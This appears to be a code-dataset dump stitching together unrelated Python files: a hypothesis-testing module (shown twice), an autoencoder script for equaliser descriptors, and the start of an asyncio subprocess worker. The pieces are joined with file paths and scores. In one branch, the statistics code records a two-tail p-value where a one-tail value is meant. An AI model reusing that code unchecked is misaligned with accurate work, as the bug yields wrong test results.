result_dict['df'] = df_1 + df_2
results += f"""
t Test
===================================
t (Observed value) = {t_summary[0]:.{precision}f}
p-value (two-tail) = {t_summary[1]:.{precision}f} ({inter_p_value(t_summary[1])})
t (Critical, two-tail) = {t_critical_two:.{precision}f}
DF = {(df_1 + df_2):.{precision}f}
Reject H_0 → {flag}
"""
else:
flag = t_summary[1] / 2 < alpha
result_dict['t_observed_value'] = t_summary[0]
result_dict['t_p_value'] = t_summary[1] / 2
result_dict['df'] = df_1 + df_2
results += f"""
t Test
===================================
t (Observed value) = {t_summary[0]:.{precision}f}
p-value (one-tail) = {(t_summary[1] / 2):.{precision}f} ({inter_p_value(t_summary[1] / 2)})
t (Critical, one-tail) = {t_critical_one:.{precision}f}
DF = {(df_1 + df_2):.{precision}f}
Reject H_0 → {flag}
"""
if 3 in stages:
cm_result = sms.CompareMeans(
sms.DescrStatsW(a), sms.DescrStatsW(b))
conf_table = cm_result.summary(
usevar='unequal', alpha=alpha)
conf_interval = list(
map(float, conf_table.as_text().split('\n')[4].split()[6:]))
con_coef = 1 - alpha
# record result
result_dict['conf_interval'] = conf_interval
results += f"""
Confidence Interval
===================================
{con_coef * 100:.1f}% Confidence Interval: [{conf_interval[0]:.{precision}f}, {conf_interval[1]:.{precision}f}]
"""
else:
ttest_result = stats.ttest_ind(a, b, equal_var=True)
t_summary = list(ttest_result)
t_critical_two = stats.t.ppf(1 - alpha/2, df=(df_1 + df_2))
if opt == 'r':
t_critical_one = stats.t.ppf(1 - alpha, df=(df_1 + df_2))
result_dict['t_critical_one'] = t_critical_one
elif opt == 'l':
t_critical_one = stats.t.ppf(alpha, df=(df_1 + df_2))
result_dict['t_critical_one'] = t_critical_one
if opt == 't':
flag = t_summary[1] < alpha
result_dict['t_critical_two'] = t_critical_two
result_dict['t_observed_value'] = t_summary[0]
result_dict['t_p_value'] = t_summary[1]
result_dict['df'] = df_1 + df_2
results += f"""
t Test
===================================
t (Observed value) = {t_summary[0]:.{precision}f}
p-value (two-tail) = {t_summary[1]:.{precision}f} ({inter_p_value(t_summary[1])})
t (Critical, two-tail) = {t_critical_two:.{precision}f}
DF = {(df_1 + df_2):.{precision}f}
Reject H_0 → {flag}
"""
else:
flag = t_summary[1] / 2 < alpha
result_dict['t_observed_value'] = t_summary[0]
result_dict['t_p_value'] = t_summary[1]
result_dict['df'] = df_1 + df_2
results += f"""
t Test
===================================
t (Observed value) = {t_summary[0]:.{precision}f}
p-value (one-tail) = {(t_summary[1] / 2):.{precision}f} ({inter_p_value(t_summary[1] / 2)})
t (Critical, one-tail) = {t_critical_one:.{precision}f}
DF = {(df_1 + df_2):.{precision}f}
Reject H_0 → {flag}
"""
if 3 in stages:
cm_result = sms.CompareMeans(
sms.DescrStatsW(a), sms.DescrStatsW(b))
conf_table = cm_result.summary(
usevar='pooled', alpha=alpha)
conf_interval = list(
map(float, conf_table.as_text().split('\n')[4].split()[6:]))
# record result
result_dict['conf_interval'] = conf_interval
con_coef = 1 - alpha
results += f"""
Confidence Interval
===================================
{con_coef * 100:.1f}% Confidence Interval: [{conf_interval[0]:.{precision}f}, {conf_interval[1]:.{precision}f}]
"""
if show_table == True and 3 in stages:
results += f"""{conf_table.as_text()}"""
if show == True:
print(results)
return result_dict
def _check_normality(n1, n2, p1, p2):
if n1 * p1 >= 5 and n2 * p2 >= 5 and n1 * (1-p1) >= 5 and n2 * (1-p2) >= 5:
return True
else:
return False
def two_population_proportion(a, b, D, option='right', alpha=0.05, precision=4, show=True):
opt = option.lower()[0]
p1 = a.mean()
p2 = b.mean()
n1, n2 = len(a), len(b)
result_dict = dict()
result_dict['D'] = D
result_dict['p1'] = p1
result_dict['p2'] = p2
result_dict['n1'] = n1
result_dict['n2'] = n2
result_dict['Normal'] = _check_normality(n1, n2, p1, p2)
if D == 0:
ab_concat = np.concatenate([a, b])
p_pool = ab_concat.mean()
sd_p = (p_pool * (1 - p_pool) *
(1 / n1 + 1 / n2)) ** 0.5
else:
sd_p = (p1 * (1-p1) / n1 + p2 * (1 - p2) / n2) ** 0.5
result_dict['sd_p'] = sd_p
z_value = ((p1 - p2) - D) / sd_p
result_dict['z_value'] = z_value
p_value = 1 - stats.norm.cdf(z_value) # right
if opt == 't':
# two-tail test
text = 'Two-Tail Test'
if p_value > 0.5:
p_value = 1 - p_value
p_value *= 2
zcv = stats.norm.ppf(1 - alpha/2)
flag = p_value < alpha
sub_result = f'''Using {text}:
z (Observed value, {text}) = {z_value:.{precision}f}
z (Critical value, {text}) = {-zcv:.{precision}f}, {zcv:.{precision}f}
p-value = {p_value:.{precision}f} ({inter_p_value(p_value)})
Reject H_0 → {flag}'''
else:
if opt == 'l':
text = 'One-Tail Test (left tail)'
p_value = stats.norm.cdf(z_value)
zcv = -stats.norm.ppf(1 - alpha)
elif opt == 'r':
text = 'One-Tail Test (right tail)'
zcv = stats.norm.ppf(1 - alpha)
flag = p_value < alpha
sub_result = f'''Using {text}:
z (Observed value) = {z_value:.{precision}f}
z (Critical value) = {zcv:.{precision}f}
p-value = {p_value:.{precision}f} ({inter_p_value(p_value)})
Reject H_0 → {flag}'''
result_dict['p_value'] = p_value
result_dict['zcv'] = zcv
zcv = stats.norm.ppf(1 - alpha/2)
con_coef = 1 - alpha
sd_p = (p1 * (1-p1) / n1 + p2 * (1 - p2) / n2) ** 0.5 # always
LCL = p1-p2 - zcv*sd_p
UCL = p1-p2 + zcv*sd_p
conf_interval = [LCL, UCL]
result_dict['conf_interval'] = conf_interval
result = f"""======= Inf. Two Population Proportions =======
D = {D:.{precision}f}
p1 = {p1:.{precision}f}
p2 = {p2:.{precision}f}
""" + sub_result + f"""
{con_coef * 100:.1f}% Confidence Interval: [{LCL:.{precision}f}, {UCL:.{precision}f}]"""
if show:
print(result)
return result_dict | mgt2001/hyp/ind.py | import pandas as pd
import numpy as np
import math
import scipy.stats as stats
import statsmodels.stats.api as sms
def inter_p_value(p_value):
# interpretation
if p_value >= 0 and p_value < 0.01:
inter_p = 'Overwhelming Evidence'
elif p_value >= 0.01 and p_value < 0.05:
inter_p = 'Strong Evidence'
elif p_value >= 0.05 and p_value < 0.1:
inter_p = 'Weak Evidence'
elif p_value >= .1:
inter_p = 'No Evidence'
return inter_p
def two_population(a, b, alpha=.05, consistency='equal', option='right', show_table=False, stages=[1, 2, 3], show=True, precision=4, matched_pairs=False):
"""
+ [First stage]: F Statistics - consistency: equal, left (1 is more consistent than 2), right (2 is more consistent than 1)
+ [Second stage]: t Test
+ [Third stage]: Confidence Interval
Will return a result_dict regardless of stages.
"""
opt = option.lower()[0]
results = ""
const = consistency.lower()[0]
result_dict = dict()
df_1 = len(a) - 1
df_2 = len(b) - 1
if 1 in stages:
varall = [stats.describe(a).variance,
stats.describe(b).variance]
f_value = varall[0] / varall[1]
result_dict['varall'] = varall
result_dict['f_value'] = f_value
ptmp = stats.f.cdf(f_value, df_1, df_2)
if const == 'e':
if ptmp > 0.5:
ptmp = 1 - ptmp
p_value = ptmp * 2
rej_upper = stats.f.ppf(1 - alpha/2, df_1, df_2)
rej_lower = stats.f.ppf(alpha/2, df_1, df_2)
result_dict['f_rej_upper'] = rej_upper
result_dict['f_rej_lower'] = rej_lower
if f_value < rej_lower or f_value > rej_upper:
flag = True
else:
flag = False
text = 'unequal variances'
else:
rej_upper = stats.f.ppf(1 - alpha, df_1, df_2)
rej_lower = stats.f.ppf(alpha, df_1, df_2)
if const == 'r':
result_dict['f_rej_upper'] = rej_upper
p_value = 1 - ptmp
if f_value > rej_upper:
flag = True
else:
flag = False
text = 'σ_1/σ_2 > 1'
else:
result_dict['f_rej_lower'] = rej_lower
p_value = ptmp
if f_value < rej_lower:
flag = True
else:
flag = False
text = 'σ_1/σ_2 < 1'
result_dict['p_value'] = p_value
results = f""" F Statistics
===================================
F statistic = {f_value:.{precision}f}
p-value = {p_value:.{precision}f} ({inter_p_value(p_value)})
Reject H_0 ({text}) → {flag}
"""
if 2 in stages:
if matched_pairs:
samp_diff = a - b
nobs = samp_diff.shape[0]
df = nobs - 1
tmpdesc = stats.describe(samp_diff)
t_value = tmpdesc.mean / (tmpdesc.variance ** 0.5) * (nobs ** 0.5)
# p-values
ptmp = stats.t.cdf(t_value, df)
if opt == 'r':
text = 'one-tail'
tcv = stats.t.ppf(1 - alpha, df=df)
p_value = 1 - ptmp
elif opt == 'l':
text = 'one-tail'
p_value = ptmp
tcv = stats.t.ppf(alpha, df=df)
else:
text = 'two-tail'
tcv = stats.t.ppf(1 - alpha/2, df=df)
if ptmp > 0.5:
ptmp = 1 - ptmp
p_value = ptmp * 2
flag = p_value < alpha
results += f"""
t Test
===================================
t (Observed value) = {t_value:.{precision}f}
p-value ({text}) = {p_value:.{precision}f} ({inter_p_value(p_value)})
t (Critical, ({text})) = {tcv:.{precision}f}
DF = {(df):.{precision}f}
Reject H_0 → {flag}
"""
result_dict['t_p_value'] = p_value
result_dict['t_critical_value'] = tcv
result_dict['t_observed_value'] = t_value
t_alpha = stats.t.ppf(1 - alpha / 2, df)
std_xbar = (tmpdesc.variance / nobs) ** 0.5
LCL = tmpdesc.mean - t_alpha * std_xbar
UCL = tmpdesc.mean + t_alpha * std_xbar
con_coef = 1 - alpha
conf_interval = [LCL, UCL]
result_dict['conf_interval'] = conf_interval
results += f"""
Confidence Interval
===================================
{con_coef * 100:.1f}% Confidence Interval: [{LCL:.{precision}f}, {UCL:.{precision}f}]
"""
else:
if flag: # True == unequal variance
ttest_result = stats.ttest_ind(a, b, equal_var=False)
t_summary = list(ttest_result)
t_critical_two = stats.t.ppf(1 - alpha/2, df=(df_1 + df_2))
if opt == 'r':
t_critical_one = stats.t.ppf(1 - alpha, df=(df_1 + df_2))
result_dict['t_critical_one'] = t_critical_one
elif opt == 'l':
t_critical_one = stats.t.ppf(alpha, df=(df_1 + df_2))
result_dict['t_critical_one'] = t_critical_one
if opt == 't':
flag = t_summary[1] < alpha
result_dict['t_critical_two'] = t_critical_two
result_dict['t_observed_value'] = t_summary[0]
result_dict['t_p_value'] = t_summary[1]
result_dict['df'] = df_1 + df_2
results += f"""
t Test
===================================
t (Observed value) = {t_summary[0]:.{precision}f}
p-value (two-tail) = {t_summary[1]:.{precision}f} ({inter_p_value(t_summary[1])})
t (Critical, two-tail) = {t_critical_two:.{precision}f}
DF = {(df_1 + df_2):.{precision}f}
Reject H_0 → {flag}
"""
else:
flag = t_summary[1] / 2 < alpha
result_dict['t_observed_value'] = t_summary[0]
result_dict['t_p_value'] = t_summary[1] / 2
result_dict['df'] = df_1 + df_2
results += f"""
t Test
===================================
t (Observed value) = {t_summary[0]:.{precision}f}
p-value (one-tail) = {(t_summary[1] / 2):.{precision}f} ({inter_p_value(t_summary[1] / 2)})
t (Critical, one-tail) = {t_critical_one:.{precision}f}
DF = {(df_1 + df_2):.{precision}f}
Reject H_0 → {flag}
"""
if 3 in stages:
cm_result = sms.CompareMeans(
sms.DescrStatsW(a), sms.DescrStatsW(b))
conf_table = cm_result.summary(
usevar='unequal', alpha=alpha)
conf_interval = list(
map(float, conf_table.as_text().split('\n')[4].split()[6:]))
con_coef = 1 - alpha
# record result
result_dict['conf_interval'] = conf_interval
results += f"""
Confidence Interval
===================================
{con_coef * 100:.1f}% Confidence Interval: [{conf_interval[0]:.{precision}f}, {conf_interval[1]:.{precision}f}]
"""
else:
ttest_result = stats.ttest_ind(a, b, equal_var=True)
t_summary = list(ttest_result)
t_critical_two = stats.t.ppf(1 - alpha/2, df=(df_1 + df_2))
if opt == 'r':
t_critical_one = stats.t.ppf(1 - alpha, df=(df_1 + df_2))
result_dict['t_critical_one'] = t_critical_one
elif opt == 'l':
t_critical_one = stats.t.ppf(alpha, df=(df_1 + df_2))
result_dict['t_critical_one'] = t_critical_one
if opt == 't':
flag = t_summary[1] < alpha
result_dict['t_critical_two'] = t_critical_two
result_dict['t_observed_value'] = t_summary[0]
result_dict['t_p_value'] = t_summary[1]
result_dict['df'] = df_1 + df_2
results += f"""
t Test
===================================
t (Observed value) = {t_summary[0]:.{precision}f}
p-value (two-tail) = {t_summary[1]:.{precision}f} ({inter_p_value(t_summary[1])})
t (Critical, two-tail) = {t_critical_two:.{precision}f}
DF = {(df_1 + df_2):.{precision}f}
Reject H_0 → {flag}
"""
else:
flag = t_summary[1] / 2 < alpha
result_dict['t_observed_value'] = t_summary[0]
result_dict['t_p_value'] = t_summary[1]
result_dict['df'] = df_1 + df_2
results += f"""
t Test
===================================
t (Observed value) = {t_summary[0]:.{precision}f}
p-value (one-tail) = {(t_summary[1] / 2):.{precision}f} ({inter_p_value(t_summary[1] / 2)})
t (Critical, one-tail) = {t_critical_one:.{precision}f}
DF = {(df_1 + df_2):.{precision}f}
Reject H_0 → {flag}
"""
if 3 in stages:
cm_result = sms.CompareMeans(
sms.DescrStatsW(a), sms.DescrStatsW(b))
conf_table = cm_result.summary(
usevar='pooled', alpha=alpha)
conf_interval = list(
map(float, conf_table.as_text().split('\n')[4].split()[6:]))
# record result
result_dict['conf_interval'] = conf_interval
con_coef = 1 - alpha
results += f"""
Confidence Interval
===================================
{con_coef * 100:.1f}% Confidence Interval: [{conf_interval[0]:.{precision}f}, {conf_interval[1]:.{precision}f}]
"""
if show_table == True and 3 in stages:
results += f"""{conf_table.as_text()}"""
if show == True:
print(results)
return result_dict
def _check_normality(n1, n2, p1, p2):
if n1 * p1 >= 5 and n2 * p2 >= 5 and n1 * (1-p1) >= 5 and n2 * (1-p2) >= 5:
return True
else:
return False
def two_population_proportion(a, b, D, option='right', alpha=0.05, precision=4, show=True):
opt = option.lower()[0]
p1 = a.mean()
p2 = b.mean()
n1, n2 = len(a), len(b)
result_dict = dict()
result_dict['D'] = D
result_dict['p1'] = p1
result_dict['p2'] = p2
result_dict['n1'] = n1
result_dict['n2'] = n2
result_dict['Normal'] = _check_normality(n1, n2, p1, p2)
if D == 0:
ab_concat = np.concatenate([a, b])
p_pool = ab_concat.mean()
sd_p = (p_pool * (1 - p_pool) *
(1 / n1 + 1 / n2)) ** 0.5
else:
sd_p = (p1 * (1-p1) / n1 + p2 * (1 - p2) / n2) ** 0.5
result_dict['sd_p'] = sd_p
z_value = ((p1 - p2) - D) / sd_p
result_dict['z_value'] = z_value
p_value = 1 - stats.norm.cdf(z_value) # right
if opt == 't':
# two-tail test
text = 'Two-Tail Test'
if p_value > 0.5:
p_value = 1 - p_value
p_value *= 2
zcv = stats.norm.ppf(1 - alpha/2)
flag = p_value < alpha
sub_result = f'''Using {text}:
z (Observed value, {text}) = {z_value:.{precision}f}
z (Critical value, {text}) = {-zcv:.{precision}f}, {zcv:.{precision}f}
p-value = {p_value:.{precision}f} ({inter_p_value(p_value)})
Reject H_0 → {flag}'''
else:
if opt == 'l':
text = 'One-Tail Test (left tail)'
p_value = stats.norm.cdf(z_value)
zcv = -stats.norm.ppf(1 - alpha)
elif opt == 'r':
text = 'One-Tail Test (right tail)'
zcv = stats.norm.ppf(1 - alpha)
flag = p_value < alpha
sub_result = f'''Using {text}:
z (Observed value) = {z_value:.{precision}f}
z (Critical value) = {zcv:.{precision}f}
p-value = {p_value:.{precision}f} ({inter_p_value(p_value)})
Reject H_0 → {flag}'''
result_dict['p_value'] = p_value
result_dict['zcv'] = zcv
zcv = stats.norm.ppf(1 - alpha/2)
con_coef = 1 - alpha
sd_p = (p1 * (1-p1) / n1 + p2 * (1 - p2) / n2) ** 0.5 # always
LCL = p1-p2 - zcv*sd_p
UCL = p1-p2 + zcv*sd_p
conf_interval = [LCL, UCL]
result_dict['conf_interval'] = conf_interval
result = f"""======= Inf. Two Population Proportions =======
D = {D:.{precision}f}
p1 = {p1:.{precision}f}
p2 = {p2:.{precision}f}
""" + sub_result + f"""
{con_coef * 100:.1f}% Confidence Interval: [{LCL:.{precision}f}, {UCL:.{precision}f}]"""
if show:
print(result)
return result_dict | 0.436622 | 0.471284 |
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import os
import io
import sys
import glob
import argparse
from datetime import datetime
from collections import OrderedDict
import numpy as np
import pandas as pd
import scipy.io as sio
import tensorflow as tf
from tensorflow.keras import layers
from tensorflow.keras.models import model_from_json
from sklearn.linear_model import SGDClassifier
import matplotlib.pyplot as plt
from models import *
from utils import *
def generate(data, descriptors, dim, beta, encoder, decoder, classifier=True, visualize=False):
"""Generate latent space embeddings (or codes) for each model and given semantic descriptors.
This function takes in the training data (or testing) along with a set of encoder and decoder models.
We then use the Stochastic Gradient Descent algorithm in sci-kit learn in order to separate the two descriptors
within the latent space. Using this line we draw a perpendicular line and move along that line in either direction,
where each direction moves towards a code that is more heavily linked to the respective semantic descriptor.
Our current method here for determining these codes is fairly clunky and ideal.
It does sometimes produce codes that are not extremely representative of their class,
but overall it works well enough for the time being.
Args:
data (DataFrame) : Pandas dataframe with equalizer parameter data (normalized)
descriptors (list) : List of the semantic descriptors as strings
dim (int) : Latent dimensions of the autoencoder model
beta (float) : Disentanglement factor for the supplied models
encoder (model) : Trained encoder Keras model
decoder (model) : trained decoder Keras model
classifier (bool) : Use a linear classifier, otherwise randomally sample data
visualize (bool) : Create scatter plots of data and generated embeddings
"""
# generate embeddings for data points
x = np.array(data.values[:,1:])
a = encoder.predict(x, batch_size=8)
z_mean, _, _ = encoder.predict(x, batch_size=8)
classes = OrderedDict({b: a for a, b in enumerate(set(descriptors))})
labels = data['descriptor'].map(classes, na_action='ignore').values
codes = OrderedDict({})
for descriptor_class, descriptor_index in classes.items():
class_samples = z_mean[np.where(labels == descriptor_index)[0]]
if classifier:
# create linear classifier
clf = SGDClassifier()
clf.fit(z_mean, labels)
for factor in [0.5, 1, 2]:
code = -(clf.intercept_[0]/clf.coef_[0]) + factor
if clf.predict([code]) != descriptor_index:
code = -(clf.intercept_[0]/clf.coef_[0]) - factor
codes[f"{dim}d_{descriptor_class}{factor+1}"] = code
x = denormalize_params(decoder.predict(np.array([code])))[0]
plot_filename = os.path.join("plots", "embeddings", f"{code}.png")
#print(plot_filename)
plot_tf(x, plot_title=f"{dim}d_{descriptor_class}{factor+1}", to_file=plot_filename)
else:
for factor in np.arange(0,3):
code_idx = np.random.choice(class_samples.shape[0])
code = class_samples[code_idx,:]
codes[f"{dim}d_{descriptor_class}{factor+1}"] = code
print(code)
if visualize:
colors = ["#444e86", "#ff6e54", "#dd5182", "#955196"]
if dim == 1:
fig, ax = plt.subplots(figsize=(12, 10))
elif dim == 2:
fig, ax = plt.subplots(figsize=(12, 10))
else:
fig = plt.figure(figsize=(12, 10))
ax = fig.add_subplot(111, projection='3d')
for descriptor_class, descriptor_index in classes.items():
class_samples = z_mean[np.where(labels == descriptor_index)[0]]
if dim == 3:
scatter = ax.scatter(class_samples[:,0], class_samples[:,1], class_samples[:,2],
c=colors[descriptor_index], label=descriptor_class)
elif dim == 2:
scatter = ax.scatter(class_samples[:,0], class_samples[:,1],
c=colors[descriptor_index], label=descriptor_class)
else:
scatter = ax.scatter(class_samples[:,0], (np.ones(class_samples[:,0].shape) * descriptor_index)/4,
c=colors[descriptor_index], label=descriptor_class)
for idx, (descriptor_class, code) in enumerate(codes.items()):
if idx < 3:
c_offset = 0
else:
c_offset = 1
if dim == 3:
scatter = ax.scatter(code[0], code[1], code[2],
c=colors[2+c_offset], label=descriptor_class)
elif dim == 2:
scatter = ax.scatter(code[0], code[1],
c=colors[2+c_offset], label=descriptor_class)
else:
scatter = ax.scatter(code[0], 0,
c=colors[2+c_offset], label=descriptor_class)
plt.show()
return codes
if __name__ == '__main__':
parser = argparse.ArgumentParser(description='Generate average latent codes for semantic descriptors.')
parser.add_argument('modeldir', type=str, help='path directory containing all model files')
parser.add_argument('--output', type=str, help='path to output directory for mat file')
args = parser.parse_args()
# load normalized data from file
eq_params = pd.read_csv("../data/safe/normalized_eq_params.csv", sep=",", index_col=0)
count = pd.read_csv("../data/safe/descriptors.csv", sep=",", index_col=0)
# only use data points within the top 2 occuring descriptors
descriptors = count.loc[0:1, 'descriptor'].tolist()
eq_df = eq_params[eq_params['descriptor'].isin(descriptors)]
# get models
encoder_models = glob.glob(os.path.join(args.modeldir, 'encoders', "*.h5"))
decoder_models = glob.glob(os.path.join(args.modeldir, 'decoders', "*.h5"))
# codes dictionary
codes = np.empty([3,4,6,3])
for encoder_model, decoder_model in zip(sorted(encoder_models), sorted(decoder_models)):
encoder_w = encoder_model
encoder_a = encoder_model.replace('.h5', '.json')
# model reconstruction from JSON file
with open(encoder_a, 'r') as f:
encoder = model_from_json(f.read())
# load weights into the new model
encoder.load_weights(encoder_w)
decoder_w = decoder_model
decoder_a = decoder_model.replace('.h5', '.json')
# model reconstruction from JSON file
with open(decoder_a, 'r') as f:
decoder = model_from_json(f.read())
# load weights into the new model
decoder.load_weights(decoder_w)
dim = int(os.path.basename(encoder_w)[7])
beta_max = float(os.path.basename(encoder_w)[15:20])
if np.isclose(beta_max, 0.02):
beta = 4
elif np.isclose(beta_max, 0.01):
beta = 3
elif np.isclose(beta_max, 0.001):
beta = 2
elif np.isclose(beta_max, 0.000):
beta = 1
c = generate(eq_df, descriptors, dim, beta, encoder, decoder)
for idx, (key, val) in enumerate(c.items()):
code = np.zeros(3)
code[:val.shape[0]] = val
print(dim, beta, idx, code)
codes[dim-1][beta-1][idx] = code
# check if directory exists
if not os.path.isdir(os.path.join('..','plugin','assets')):
os.makedirs(os.path.join('..','plugin','assets'))
# save the final array into a mat file in the plugin assets directory
sio.savemat(os.path.join('..','plugin','assets', 'codes.mat'), {'codes' : codes}) | train/embeddings.py | from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import os
import io
import sys
import glob
import argparse
from datetime import datetime
from collections import OrderedDict
import numpy as np
import pandas as pd
import scipy.io as sio
import tensorflow as tf
from tensorflow.keras import layers
from tensorflow.keras.models import model_from_json
from sklearn.linear_model import SGDClassifier
import matplotlib.pyplot as plt
from models import *
from utils import *
def generate(data, descriptors, dim, beta, encoder, decoder, classifier=True, visualize=False):
"""Generate latent space embeddings (or codes) for each model and given semantic descriptors.
This function takes in the training data (or testing) along with a set of encoder and decoder models.
We then use the Stochastic Gradient Descent algorithm in sci-kit learn in order to separate the two descriptors
within the latent space. Using this line we draw a perpendicular line and move along that line in either direction,
where each direction moves towards a code that is more heavily linked to the respective semantic descriptor.
Our current method here for determining these codes is fairly clunky and ideal.
It does sometimes produce codes that are not extremely representative of their class,
but overall it works well enough for the time being.
Args:
data (DataFrame) : Pandas dataframe with equalizer parameter data (normalized)
descriptors (list) : List of the semantic descriptors as strings
dim (int) : Latent dimensions of the autoencoder model
beta (float) : Disentanglement factor for the supplied models
encoder (model) : Trained encoder Keras model
decoder (model) : trained decoder Keras model
classifier (bool) : Use a linear classifier, otherwise randomally sample data
visualize (bool) : Create scatter plots of data and generated embeddings
"""
# generate embeddings for data points
x = np.array(data.values[:,1:])
a = encoder.predict(x, batch_size=8)
z_mean, _, _ = encoder.predict(x, batch_size=8)
classes = OrderedDict({b: a for a, b in enumerate(set(descriptors))})
labels = data['descriptor'].map(classes, na_action='ignore').values
codes = OrderedDict({})
for descriptor_class, descriptor_index in classes.items():
class_samples = z_mean[np.where(labels == descriptor_index)[0]]
if classifier:
# create linear classifier
clf = SGDClassifier()
clf.fit(z_mean, labels)
for factor in [0.5, 1, 2]:
code = -(clf.intercept_[0]/clf.coef_[0]) + factor
if clf.predict([code]) != descriptor_index:
code = -(clf.intercept_[0]/clf.coef_[0]) - factor
codes[f"{dim}d_{descriptor_class}{factor+1}"] = code
x = denormalize_params(decoder.predict(np.array([code])))[0]
plot_filename = os.path.join("plots", "embeddings", f"{code}.png")
#print(plot_filename)
plot_tf(x, plot_title=f"{dim}d_{descriptor_class}{factor+1}", to_file=plot_filename)
else:
for factor in np.arange(0,3):
code_idx = np.random.choice(class_samples.shape[0])
code = class_samples[code_idx,:]
codes[f"{dim}d_{descriptor_class}{factor+1}"] = code
print(code)
if visualize:
colors = ["#444e86", "#ff6e54", "#dd5182", "#955196"]
if dim == 1:
fig, ax = plt.subplots(figsize=(12, 10))
elif dim == 2:
fig, ax = plt.subplots(figsize=(12, 10))
else:
fig = plt.figure(figsize=(12, 10))
ax = fig.add_subplot(111, projection='3d')
for descriptor_class, descriptor_index in classes.items():
class_samples = z_mean[np.where(labels == descriptor_index)[0]]
if dim == 3:
scatter = ax.scatter(class_samples[:,0], class_samples[:,1], class_samples[:,2],
c=colors[descriptor_index], label=descriptor_class)
elif dim == 2:
scatter = ax.scatter(class_samples[:,0], class_samples[:,1],
c=colors[descriptor_index], label=descriptor_class)
else:
scatter = ax.scatter(class_samples[:,0], (np.ones(class_samples[:,0].shape) * descriptor_index)/4,
c=colors[descriptor_index], label=descriptor_class)
for idx, (descriptor_class, code) in enumerate(codes.items()):
if idx < 3:
c_offset = 0
else:
c_offset = 1
if dim == 3:
scatter = ax.scatter(code[0], code[1], code[2],
c=colors[2+c_offset], label=descriptor_class)
elif dim == 2:
scatter = ax.scatter(code[0], code[1],
c=colors[2+c_offset], label=descriptor_class)
else:
scatter = ax.scatter(code[0], 0,
c=colors[2+c_offset], label=descriptor_class)
plt.show()
return codes
if __name__ == '__main__':
parser = argparse.ArgumentParser(description='Generate average latent codes for semantic descriptors.')
parser.add_argument('modeldir', type=str, help='path directory containing all model files')
parser.add_argument('--output', type=str, help='path to output directory for mat file')
args = parser.parse_args()
# load normalized data from file
eq_params = pd.read_csv("../data/safe/normalized_eq_params.csv", sep=",", index_col=0)
count = pd.read_csv("../data/safe/descriptors.csv", sep=",", index_col=0)
# only use data points within the top 2 occuring descriptors
descriptors = count.loc[0:1, 'descriptor'].tolist()
eq_df = eq_params[eq_params['descriptor'].isin(descriptors)]
# get models
encoder_models = glob.glob(os.path.join(args.modeldir, 'encoders', "*.h5"))
decoder_models = glob.glob(os.path.join(args.modeldir, 'decoders', "*.h5"))
# codes dictionary
codes = np.empty([3,4,6,3])
for encoder_model, decoder_model in zip(sorted(encoder_models), sorted(decoder_models)):
encoder_w = encoder_model
encoder_a = encoder_model.replace('.h5', '.json')
# model reconstruction from JSON file
with open(encoder_a, 'r') as f:
encoder = model_from_json(f.read())
# load weights into the new model
encoder.load_weights(encoder_w)
decoder_w = decoder_model
decoder_a = decoder_model.replace('.h5', '.json')
# model reconstruction from JSON file
with open(decoder_a, 'r') as f:
decoder = model_from_json(f.read())
# load weights into the new model
decoder.load_weights(decoder_w)
dim = int(os.path.basename(encoder_w)[7])
beta_max = float(os.path.basename(encoder_w)[15:20])
if np.isclose(beta_max, 0.02):
beta = 4
elif np.isclose(beta_max, 0.01):
beta = 3
elif np.isclose(beta_max, 0.001):
beta = 2
elif np.isclose(beta_max, 0.000):
beta = 1
c = generate(eq_df, descriptors, dim, beta, encoder, decoder)
for idx, (key, val) in enumerate(c.items()):
code = np.zeros(3)
code[:val.shape[0]] = val
print(dim, beta, idx, code)
codes[dim-1][beta-1][idx] = code
# check if directory exists
if not os.path.isdir(os.path.join('..','plugin','assets')):
os.makedirs(os.path.join('..','plugin','assets'))
# save the final array into a mat file in the plugin assets directory
sio.savemat(os.path.join('..','plugin','assets', 'codes.mat'), {'codes' : codes}) | 0.718594 | 0.425725 |
import asyncio
import shlex
import subprocess
import sys
import weakref
from typing import Mapping, Sequence
from .. import utils
from ..core.formatter import FormattedEntity
from .base import Worker
class Subprocess(FormattedEntity, Worker):
"""
config:
cmd: str - shell command with mask python format
list[str] - exec command with mask python format
aioworkers: argv or str for aioworkers subprocess
stdin: [none | PIPE | DEVNULL]
stdout: [none | PIPE | DEVNULL]
stderr: [none | PIPE | STDOUT | DEVNULL]
wait: bool - default True for wait shutdown process
params: dict of params
daemon: true
format: [json|str|bytes]
"""
def __init__(self, *args, **kwargs):
super().__init__(*args, **kwargs)
self._processes = weakref.WeakValueDictionary()
self._cmd = ''
self._shell = False
self._config_stdin = False
self._wait = True
self._daemon = False
self._keeper = None
self.params = {}
async def init(self):
if self.config.get('stdin'):
stdin = getattr(subprocess, self.config.get('stdin'))
elif 'stdin' in self.config:
stdin = None
else:
stdin = subprocess.PIPE
if self.config.get('stdout'):
stdout = getattr(subprocess, self.config.get('stdout'))
elif 'stdout' in self.config:
stdout = None
else:
stdout = subprocess.PIPE
if self.config.get('stderr'):
stderr = getattr(subprocess, self.config.get('stderr'))
else:
stderr = None
self._wait = self.config.get('wait', True)
self._config_stdin = False
if 'aioworkers' in self.config:
cmd = ['{python}', '-m', 'aioworkers', '--config-stdin']
value = self.config['aioworkers']
if isinstance(value, str):
cmd.append(value)
cmd = ' '.join(cmd)
elif isinstance(value, list):
cmd.extend(value)
else:
raise TypeError(value)
stdin = subprocess.PIPE
self._config_stdin = True
elif 'cmd' in self.config:
cmd = self.config['cmd']
else:
raise ValueError
self._cmd = cmd
self._shell = self.config.get('shell', isinstance(cmd, str))
if self._shell:
coro = asyncio.create_subprocess_shell
else:
coro = asyncio.create_subprocess_exec
self.create_subprocess = lambda *args: coro(
*args, stdin=stdin, stdout=stdout,
stderr=stderr, loop=self.loop)
self.params = dict(self.config.get('params', ()))
self.params.setdefault('python', sys.executable)
self.params.setdefault('config', self.config)
self.params.setdefault('worker', self)
self._daemon = self.config.get('daemon')
self._keeper = None
if self._daemon:
self._wait = False
self._event = asyncio.Event(loop=self.loop)
self._event.clear()
await super().init()
@property
def process(self):
for p in self._processes.values():
if p.returncode is None:
return p
def make_command(self, value):
cmd = self._cmd
args = ()
m = dict(self.params)
if isinstance(value, Mapping):
m.update(value)
elif isinstance(value, Sequence):
args = value
elif isinstance(value, str):
args = value,
is_cmd_str = isinstance(cmd, str)
if is_cmd_str:
cmd = cmd.format_map(m)
else:
cmd = [part.format_map(m) for part in cmd]
cmd.extend(args)
if self._shell and not is_cmd_str:
cmd = ' '.join(cmd)
elif not self._shell and is_cmd_str:
